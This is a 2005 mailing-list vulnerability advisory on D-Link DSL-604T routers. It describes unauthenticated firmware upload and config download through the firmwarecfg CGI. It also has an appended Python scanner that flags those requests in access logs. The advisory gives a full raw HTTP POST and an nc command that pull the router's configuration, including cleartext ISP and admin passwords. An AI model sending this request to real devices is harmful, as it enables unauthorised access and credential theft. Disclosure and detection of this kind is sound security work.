
504T and now also 604T remote access.



Dear ZARAZA,

the problem pointed out by Francesco Orro is completely different from the one I had. Yes, the file is the same, but if you continue reading, you can see what I just said:
the two bugs are completely different.
The one I've described can be used even if it is not the first access to the router, the opposite
of what is written in Orro's mail; the method of exploitation is different too.
Anyway, I found that D-Link tried to fix this bug in the DSL-604T series, but it seems that it
didn't do so well. Here is another post about this other bug:

Device: CUSTOMER=DLinkEU MODEL=DSL-604T
Version: only tested with VERSION=V1.00B02T02.EU.20040610
Bugs: i)  remote firmware upgrade without password
     ii) config retrieval without password
Exploitation: remote
Date: 27/05/2005
Status: vendor contacted
Workaround: disable remote web management
Author: Alessandro Audero

The Bug

DSL-604T is a D-Link router/ADSL modem with a Linux system on it based
on MIPS 4KEc V4.8. This is the uname that I found on the device I
tested:

Linux version 2.4.17_mvl21-malta-mips_fp_le
(tiger@xxxxxxxxxxxxxxxxxxxxx) (gcc version 2.95.3 20010315
(release/MontaVista)) #71 Tue Feb 17 01:16:45 GMT 2004

It supports a remote web management console, which at first sight asks for
a username and a password. The URL should be something like this:

http://ipaddress/

and if you click on 'login' you'll get this other URL:

http://ipaddress/cgi-bin/webcm

that obviously tells you that you have typed in a wrong password.

This router seems to fix the previous 504T vulnerability, denying dir listing
of /cgi-bin/ and calling firmwarecfg from a password protected page.
But if you look at the source of the frame

http://ipaddress/cgi-bin/webcm?getpage=../html/tools/updgateway.htm

you can see that firmwarecfg is called with a POST and that this action
is allowed even if you don't know any password.
Configuration and password retrieval is in this way possible.
You can use a POST like this:

POST /cgi-bin/firmwarecfg HTTP/1.1\r\n
Host: 192.168.8.4\r\n
User-Agent: yeah\r\n
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\r\n
Accept-Language: en-us,en;q=0.5\r\n
Accept-Encoding: gzip,deflate\r\n
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n
Keep-Alive: 300\r\n
Connection: keep-alive\r\n
Content-Type: multipart/form-data; boundary=---------------------------41184676334\r\n
Content-Length: 234\r\n
\r\n
-----------------------------41184676334\r\n
Content-Disposition: form-data; name="config.x"\r\n
\r\n
\r\n
-----------------------------41184676334\r\n
Content-Disposition: form-data; name="config.y"\r\n
\r\n
\r\n
-----------------------------41184676334--\r\n
\r\n

Saving this stuff in a file and then doing something like this:

cat lamepost.txt | nc ipaddress 80 > ipaddress.config.xml

you have the router config in ipaddress.config.xml.
Same trick as in the previous paper: username and password are written in
clear text, even those of the internet provider, mail, etc.

That's all, folks.


Alessandro Audero

Rhapsody
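As an added defensive example (not part of the original post or of D-Link's firmware), the following Python flags the two request patterns the advisory describes, the unauthenticated POST to /cgi-bin/firmwarecfg and the getpage fetch of the updgateway.htm frame, and rates them high when they arrive from outside the LAN, which is exactly what the "disable remote web management" workaround is meant to stop. It assumes access log lines in Common Log Format captured by a perimeter device in front of the router, which the post does not describe; the sample lines are constructed.

```python
import re
import ipaddress
from typing import Dict, List, Optional

# Constructed sample lines in Common Log Format, as a perimeter device in front
# of the router might record them. None of these lines come from the advisory.
SAMPLE_LOG = """\
192.168.8.10 - - [27/May/2005:10:01:02 +0200] "GET /cgi-bin/webcm HTTP/1.1" 200 1532
203.0.113.7 - - [27/May/2005:10:02:15 +0200] "GET /cgi-bin/webcm?getpage=../html/tools/updgateway.htm HTTP/1.1" 200 2210
203.0.113.7 - - [27/May/2005:10:02:31 +0200] "POST /cgi-bin/firmwarecfg HTTP/1.1" 200 8421
192.168.8.10 - - [27/May/2005:10:05:00 +0200] "POST /cgi-bin/firmwarecfg HTTP/1.1" 200 8421
"""

CLF_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

# Endpoints named in the advisory: the config/firmware handler that answers
# without a password, and the frame whose source exposes the POST form.
FIRMWARECFG = "/cgi-bin/firmwarecfg"
UPDGATEWAY_FRAGMENT = "updgateway.htm"
RFC1918 = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]


def is_remote(ip: str) -> bool:
    """True when the source address is not on an RFC 1918 LAN range."""
    addr = ipaddress.ip_address(ip)
    return not any(addr in net for net in RFC1918)


def classify(line: str) -> Optional[Dict[str, str]]:
    """Return a finding for one CLF line, or None when nothing matches."""
    m = CLF_RE.match(line)
    if not m:
        return None
    method, path, ip = m["method"], m["path"], m["ip"]
    if method == "POST" and path.startswith(FIRMWARECFG):
        reason = "POST to firmwarecfg (config download or firmware upload)"
    elif method == "GET" and "getpage=" in path and UPDGATEWAY_FRAGMENT in path:
        reason = "getpage fetch of the updgateway frame"
    else:
        return None
    # Remote hits are the case the workaround closes; LAN hits are still
    # reported, since the handler answers without any password either way.
    severity = "high" if is_remote(ip) else "info"
    return {"ip": ip, "ts": m["ts"], "path": path, "reason": reason, "severity": severity}


def scan(log_text: str) -> List[Dict[str, str]]:
    """Run classify() over every line and keep the findings."""
    return [f for f in (classify(l) for l in log_text.splitlines()) if f]


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```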